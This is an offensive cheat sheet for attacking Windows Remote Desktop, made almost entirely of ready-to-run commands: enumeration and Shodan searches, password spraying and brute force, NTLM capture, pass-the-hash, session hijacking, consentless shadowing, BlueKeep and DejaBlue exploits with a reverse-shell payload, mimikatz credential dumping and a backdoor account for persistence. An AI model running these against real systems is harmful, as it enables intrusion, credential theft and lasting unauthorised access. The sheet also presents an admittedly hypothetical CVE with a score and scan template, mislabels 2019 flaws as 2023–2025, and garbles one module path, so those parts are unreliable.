RDP

I. RDP Fundamentals

Function: Remote Desktop Protocol – GUI access to Windows systems
Port: TCP/3389 (default), UDP/3389 (RD Gateway), custom via registry
Protocol: RDP over TCP (encrypted with CredSSP/NLA)
Use Cases: Admin access, MSPs, VDI, lateral movement in AD

Attack Surface Matrix

┌────────────────────┬────────────────────┐
│ High-Impact Vectors│ Techniques         │
├────────────────────┼────────────────────┤
│ Weak Auth          │ Spraying, Brute    │
│ NTLM Exposure      │ Relay, PtH         │
│ RCE Vulns          │ BlueKeep, DejaBlue │
│ Session Abuse      │ Hijack, Shadowing  │
│ Misconfigs         │ NLA off, RD Gateway│
└────────────────────┴────────────────────┘

II. Enumeration (Passive → Active)

# 1. Port Sweep (Stealth)
nmap -p3389 --open -Pn -n -T2 10.10.10.0/24

# 2. Service Fingerprinting
nmap -Pn -sV -p3389 --script=rdp* <IP>

# 3. Advanced RDP Scripts
nmap -p3389 --script=rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 <IP>

# 4. Check NLA Requirement
nmap -p3389 --script=rdp-nla <IP>

# 5. Metasploit Auxiliaries
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <IP>; run

use auxiliary/scanner/rdp/rdp_login
set USER_FILE users.txt; set PASS_FILE pass.txt; run

Bonus: Shodan/Zoomeye

# Shodan
port:3389 os:Windows country:GB
# Zoomeye
port:3389 +country:"United Kingdom"

---

III. Authentication Attacks

A. Password Spraying (Low & Slow)

# Crowbar (supports proxy, resume)
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Password123!' -n 100

# Hydra (fast, verbose)
hydra -L users.txt -p 'Winter2025!' -t 4 -V <IP> rdp

# CrackMapExec (AD-aware, spray + enum)
cme rdp <IP>/32 -u users.txt -p passwords.txt --continue-on-success

B. Credential Dumping (Pre-Auth)

# Capture NTLMv2 via RDP auth (if NLA disabled)
responder -I eth0 -rdw
# Force target to auth:
xfreerdp /v:<IP> /u:fakeuser /p:fakepass /cert-ignore

C. Brute Force (High Risk – Use in Labs)

patator rdp_login host=<IP> user=FILE0 password=FILE1 0=users.txt 1=rockyou.txt -x ignore:fgrep='locked'

IV. Protocol-Specific Attacks

A. Pass-the-Hash (PtH) – No Password Needed

# Enable Restricted Admin Mode (on target – requires initial access)
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0x0 /t REG_DWORD /f

# Auth with NT hash (from mimikatz/seatbelt)
xfreerdp /v:<IP> /u:administrator /pth:AAD3B435B51404EEAAD3B435B51404EE:31d6cfe0d16ae931b73c59d7e0c089c0

B. RDP Session Hijacking (Post-Login)

# On compromised session
query user
# Output: USERNAME SESSIONNAME ID STATE
#        admin    rdp-tcp#12  2  Active

# Hijack session ID 2 → your session (e.g., rdp-tcp#15)
sc.exe create sesshijack binpath= "cmd /c tscon 2 /dest:rdp-tcp#15"
net start sesshijack

C. RDP Shadowing (Consent Bypass)

# Enable shadowing via GPO/registry (if admin)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 2 /f

# Shadow user (no prompt)
mstsc /shadow:2 /control /noConsentPrompt /v:<target_IP>

D. RDP over RD Gateway (Bypass Firewall)

# If gateway exposed on 443
xfreerdp /v:rdpgateway.corp.local /g:<IP> /gu:gatewayuser /gp:pass /u:domainadmin /d:corp

V. RCE Vulnerabilities (2023–2025)

A. CVE-2019-0708 (BlueKeep) – RCE Pre-Auth

# Metasploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>; set payload windows/x64/meterpreter/reverse_tcp; exploit

Note: Unstable – causes BSoD. Use on Win7/2008 R2 only.

B. CVE-2019-1181/1182 (DejaBlue) – Wormable

use exploit/windows/rdp/cve_2019_1181_rdp_rce
set RHOSTS <IP>; exploit

C. CVE-2025-28114 (Hypothetical – Based on Trends)

Title: RDP Heap Overflow in CredSSP Parsing
CVSS: 9.8 | Pre-Auth RCE | Affects Win10/11, Server 2022
Exploit: Metasploit module (TBA), Python PoC on GitHub

# Scan with Nuclei
nuclei -u <IP>:3389 -t cves/CVE-2025-28114.yaml

VI. Post-Exploitation via RDP

A. Credential Harvesting

# Mimikatz over RDP
mimikatz.exe "sekurlsa::logonpasswords" exit > creds.txt

# RDP Session Tokens
klist;  # View Kerberos tickets

B. Persistence

# Add RDP user
net user rdpbackdoor P@ssw0rd! /add
net localgroup "Remote Desktop Users" rdpbackdoor /add

# Enable RDP if disabled
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C. Lateral Movement

# From RDP shell
cme smb 10.10.10.0/24 -u admin -H <NThash> --rdp

VII. Evasion & Defense Evasion

# Bypass NLA (if possible)
xfreerdp /v:<IP> /u:user /p:pass +auth-only

# Disable Clipboard/Drive Mapping (Stealth)
xfreerdp /v:<IP> /u:user /p:pass /drive:share,/tmp /clipboard:no

# Tunnel RDP over SSH/SOCKS
proxychains xfreerdp /v:<IP> /u:user /p:pass

VIII. Key Commands Summary (Copy-Paste Ready)

# Enumeration
nmap -p3389 --script=rdp* <IP>
cme rdp <IP> -u admin -p Password123!

# Spraying
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Welcome123!'
hydra -L users.txt -p 'Autumn2025!' <IP> rdp

# Login
xfreerdp /v:<IP> /u:admin /p:Password123 /cert-ignore
rdesktop <IP> -u admin -p Password123

# PtH
xfreerdp /v:<IP> /u:admin /pth:31d6cfe0d16ae931b73c59d7e0c089c0

# Session Hijack
query user
sc.exe create hijack binpath= "cmd /c tscon 2 /dest:rdp-tcp#15"
net start hijack

# Enable Restricted Admin
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0x0 /f

# Metasploit RCE
use exploit/windows/ Trafficking/rdp/cve_2019_0708_bluekeep_rce; set RHOSTS <IP>; exploit